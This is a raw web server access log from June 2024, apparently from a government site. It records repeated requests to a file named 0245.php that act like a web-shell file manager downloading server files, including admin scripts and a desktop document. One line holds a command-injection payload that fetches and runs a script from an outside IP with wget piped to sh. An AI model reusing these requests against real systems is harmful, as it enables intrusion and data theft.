40.77.167.38 - - [23/Jun/2024:09:33:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0460.pdf HTTP/1.1" 304 -
66.249.66.20 - - [23/Jun/2024:09:33:44 -0500] "GET /Publicaciones/2024EE87248.pdf HTTP/1.1" 404 227
47.128.125.227 - - [23/Jun/2024:09:34:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=edit-tag-form.php&ft=download&white=1 HTTP/1.1" 200 7598
201.245.192.253 - - [23/Jun/2024:09:36:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
45.32.106.18 - - [23/Jun/2024:09:36:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=options-media.php&ft=download&white=1 HTTP/1.1" 200 5832
52.167.144.140 - - [23/Jun/2024:09:37:29 -0500] "GET /Publicaciones/2024EE115576.pdf HTTP/1.1" 404 228
216.245.221.92 - - [23/Jun/2024:09:37:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:09:37:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:09:37:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
66.249.66.19 - - [23/Jun/2024:09:37:51 -0500] "GET /Publicaciones/2024EE83601.pdf HTTP/1.1" 404 227
47.128.54.211 - - [23/Jun/2024:09:38:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page103.swf&ft=download HTTP/1.1" 200 21286
162.55.162.137 - - [23/Jun/2024:09:38:57 -0500] "GET / HTTP/1.1" 200 4720
186.145.90.155 - - [23/Jun/2024:09:38:59 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19f9AxYkUwNNccfOz/aweipkVH0PhtJOrpa2tfT5hx9IrEeAZVyzW5W&y=U2FsdGVkX1+mvjCJw/SUxL6NG+h9Ylods46hWFRlEdDzTyUjwZWqzOa9ZmSolsmW HTTP/1.1" 503 1124
186.145.90.155 - - [23/Jun/2024:09:39:03 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+Q3KbNsGpazfRp3verVEMAtmxFJ3fP1I7MAtBrzKX9NC28+yVs9pUh&y=U2FsdGVkX18ZX7UN6zWQ4wNwRlj+Ev82pKWAn+zlddyTtVwbUohDkFE39d4RHRad HTTP/1.1" 503 1124
201.245.192.253 - - [23/Jun/2024:09:39:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:09:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
207.46.13.111 - - [23/Jun/2024:09:40:22 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 503 1020
209.97.160.138 - - [23/Jun/2024:09:40:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cplugins%5Cexport&f=ExportYaml.class.php&ft=download HTTP/1.1" 200 6135
201.245.192.253 - - [23/Jun/2024:09:41:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
156.59.198.135 - - [23/Jun/2024:09:42:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/%3C?act=img&img=ext_php HTTP/1.0" 403 1006
216.245.221.92 - - [23/Jun/2024:09:42:30 -0500] "HEAD / HTTP/1.1" 200 -
39.37.233.112 - - [23/Jun/2024:09:43:12 -0500] "GET / HTTP/1.1" 200 319
146.190.107.60 - - [23/Jun/2024:09:44:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDesktop&f=Configurar+el+servidor.doc&ft=download HTTP/1.1" 200 21504
216.244.66.195 - - [23/Jun/2024:09:46:24 -0500] "GET /robots.txt HTTP/1.1" 404 1018
47.128.23.1 - - [23/Jun/2024:09:46:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin&f=admin.php&ft=download HTTP/1.1" 200 10730
201.245.192.253 - - [23/Jun/2024:09:46:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
194.165.16.73 - - [23/Jun/2024:09:46:41 -0500] "\x03" 400 226
52.167.144.198 - - [23/Jun/2024:09:46:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2984.pdf HTTP/1.1" 200 266379
207.46.13.111 - - [23/Jun/2024:09:47:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2926.pdf HTTP/1.1" 304 -
216.245.221.92 - - [23/Jun/2024:09:47:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [23/Jun/2024:09:47:49 -0500] "GET /Publicaciones/2024EE116509.pdf HTTP/1.1" 404 228
66.249.66.20 - - [23/Jun/2024:09:47:50 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/05451.pdf HTTP/1.1" 304 -
45.32.106.18 - - [23/Jun/2024:08:08:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2674.pdf&ft=download&white=1 HTTP/1.1" 200 327335
143.198.201.38 - - [23/Jun/2024:09:48:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1487.pdf&ft=download&white=1 HTTP/1.1" 200 356008
47.128.60.40 - - [23/Jun/2024:09:50:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5606.pdf&ft=download HTTP/1.1" 200 20135
201.245.192.253 - - [23/Jun/2024:09:51:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
185.191.127.212 - - [23/Jun/2024:09:52:04 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
216.245.221.92 - - [23/Jun/2024:09:52:30 -0500] "HEAD / HTTP/1.1" 200 -
128.199.220.158 - - [23/Jun/2024:09:52:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=user_preferences.inc.php&ft=download HTTP/1.1" 200 2232
